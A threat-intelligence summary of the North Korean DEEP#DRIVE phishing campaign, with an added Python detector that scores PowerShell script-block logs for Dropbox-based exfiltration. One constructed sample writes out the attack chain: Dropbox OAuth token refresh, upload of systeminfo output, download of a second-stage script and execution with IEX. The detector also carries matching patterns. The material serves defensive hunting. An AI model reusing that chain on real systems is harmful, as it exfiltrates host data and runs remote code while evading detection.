North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

Summary: A North Korean nation-state threat actor linked to the Kimsuky group is running a campaign dubbed DEEP#DRIVE that primarily targets South Korean businesses, government entities, and the cryptocurrency sector. The attackers use tailored phishing lures disguised as legitimate documents to gain initial access, then chain PowerShell scripts for payload delivery and data exfiltration. The campaign is ongoing, and the tradecraft is notable for frequently changing infrastructure and for routing delivery and exfiltration through a legitimate cloud service (Dropbox) so that the traffic blends with normal activity and evades detection.

Affected: South Korean businesses, government, and cryptocurrency sectors

Key points:

  • Attack attributed to Kimsuky, also known by several aliases including APT43 and Velvet Chollima.
  • Phishing emails contain decoy documents in formats like .HWP, .XLSX, and .PPTX aimed at deceiving recipients.
  • Utilizes PowerShell scripts and Dropbox for payload delivery and data exfiltration, enhancing stealth and evasion tactics.
  • The campaign may have been active since September of the previous year (the source article is dated February 2025), indicating a sustained, long-running operation rather than a one-off intrusion.
  • The PowerShell scripts authenticate to Dropbox with OAuth tokens, so reconnaissance data can be uploaded and follow-on content retrieved without any interactive login; because the traffic goes to a legitimate cloud service it blends with normal activity, and containment has to include revoking the abused tokens at the provider, which complicates incident response.
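The PowerShell-plus-Dropbox pattern in the key points above is a practical hunting opportunity: when PowerShell script-block logging (Event ID 4104) is enabled, the script text lands in the event log and can be scored for the combination of a Dropbox OAuth token refresh, an embedded client secret, Dropbox upload/download endpoints, host reconnaissance commands, and in-memory execution. The detector below is an added example written for this page; it is not code from the source article or from the campaign, and the three script blocks it scores are constructed samples, not DEEP#DRIVE artifacts. The indicator names, weights and thresholds are assumptions chosen for illustration, and a single Dropbox upload is deliberately scored as "review" rather than "high" because legitimate automation does that too.

```python
import re

# Constructed sample script-block log bodies (Event ID 4104 style).
# These are illustrative examples, NOT artifacts from the campaign.
SAMPLE_SCRIPT_BLOCKS = {
    "benign-backup": r'''
$files = Get-ChildItem C:\Reports\*.xlsx
Compress-Archive -Path $files -DestinationPath C:\Reports\weekly.zip
Write-Host "Archive created"
''',
    "admin-upload-with-env-token": r'''
$token = $env:DROPBOX_TOKEN
$hdr = @{ Authorization = "Bearer $token"; "Dropbox-API-Arg" = '{"path":"/weekly.zip","mode":"add"}' }
Invoke-WebRequest -Uri "https://content.dropboxapi.com/2/files/upload" -Headers $hdr -Method Post -InFile "C:\Reports\weekly.zip"
''',
    "suspicious-dropbox-oauth": r'''
$body = @{ grant_type = "refresh_token"; refresh_token = $rt; client_id = $cid; client_secret = $cs }
$tok = (Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Body $body).access_token
$hdr = @{ Authorization = "Bearer $tok"; "Dropbox-API-Arg" = '{"path":"/sysinfo.txt","mode":"overwrite"}' }
systeminfo | Out-File $env:TEMP\s.txt
Invoke-WebRequest -Uri "https://content.dropboxapi.com/2/files/upload" -Headers $hdr -Method Post -InFile "$env:TEMP\s.txt"
$next = Invoke-WebRequest -Uri "https://content.dropboxapi.com/2/files/download" -Headers @{ Authorization="Bearer $tok"; "Dropbox-API-Arg"='{"path":"/stage2.ps1"}' }
IEX $next.Content
''',
}

# (indicator name, regex, weight). Weights are assumptions for this example:
# the OAuth refresh grant and in-memory execution carry the most signal
# because ordinary sync/backup scripts rarely contain either.
INDICATORS = [
    ("dropbox_api_host", r"(?:api|content)\.dropboxapi\.com", 2),
    ("oauth_refresh_grant", r"grant_type\s*=\s*[\"']?refresh_token", 3),
    ("embedded_client_secret", r"\bclient_secret\b", 2),
    ("dropbox_upload", r"/2/files/upload\b", 2),
    ("dropbox_download", r"/2/files/download\b", 2),
    ("host_recon", r"\b(?:systeminfo|Get-ComputerInfo|ipconfig|tasklist|whoami)\b", 1),
    ("in_memory_exec", r"\b(?:IEX|Invoke-Expression)\b", 3),
    ("web_client", r"\b(?:Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", 1),
]

HIGH_THRESHOLD = 8     # assumption: token refresh + transfer + execution territory
REVIEW_THRESHOLD = 4   # assumption: any Dropbox API transfer deserves a look


def score_script_block(text):
    """Return (score, [indicator names]) for one script-block body.

    PowerShell is case-insensitive, so every pattern is matched with
    re.IGNORECASE. Each indicator counts at most once per block.
    """
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(name)
            score += weight
    return score, hits


def verdict(score):
    if score >= HIGH_THRESHOLD:
        return "high"
    if score >= REVIEW_THRESHOLD:
        return "review"
    return "low"


def triage(blocks):
    """Map block id -> (score, verdict, hits) for a dict of script bodies."""
    results = {}
    for block_id, text in blocks.items():
        score, hits = score_script_block(text)
        results[block_id] = (score, verdict(score), hits)
    return results


if __name__ == "__main__":
    for block_id, (score, level, hits) in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{block_id}: score={score} verdict={level} hits={hits}")
```

To run this against real data, replace SAMPLE_SCRIPT_BLOCKS with the ScriptBlockText field of exported 4104 events (for example from `Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}`); the scoring is intentionally weight-based rather than a single regex so that the benign upload and the token-refresh-plus-IEX chain land in different buckets.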

Source: https://thehackernews.com/2025/02/north-korean-apt43-uses-powershell-and.html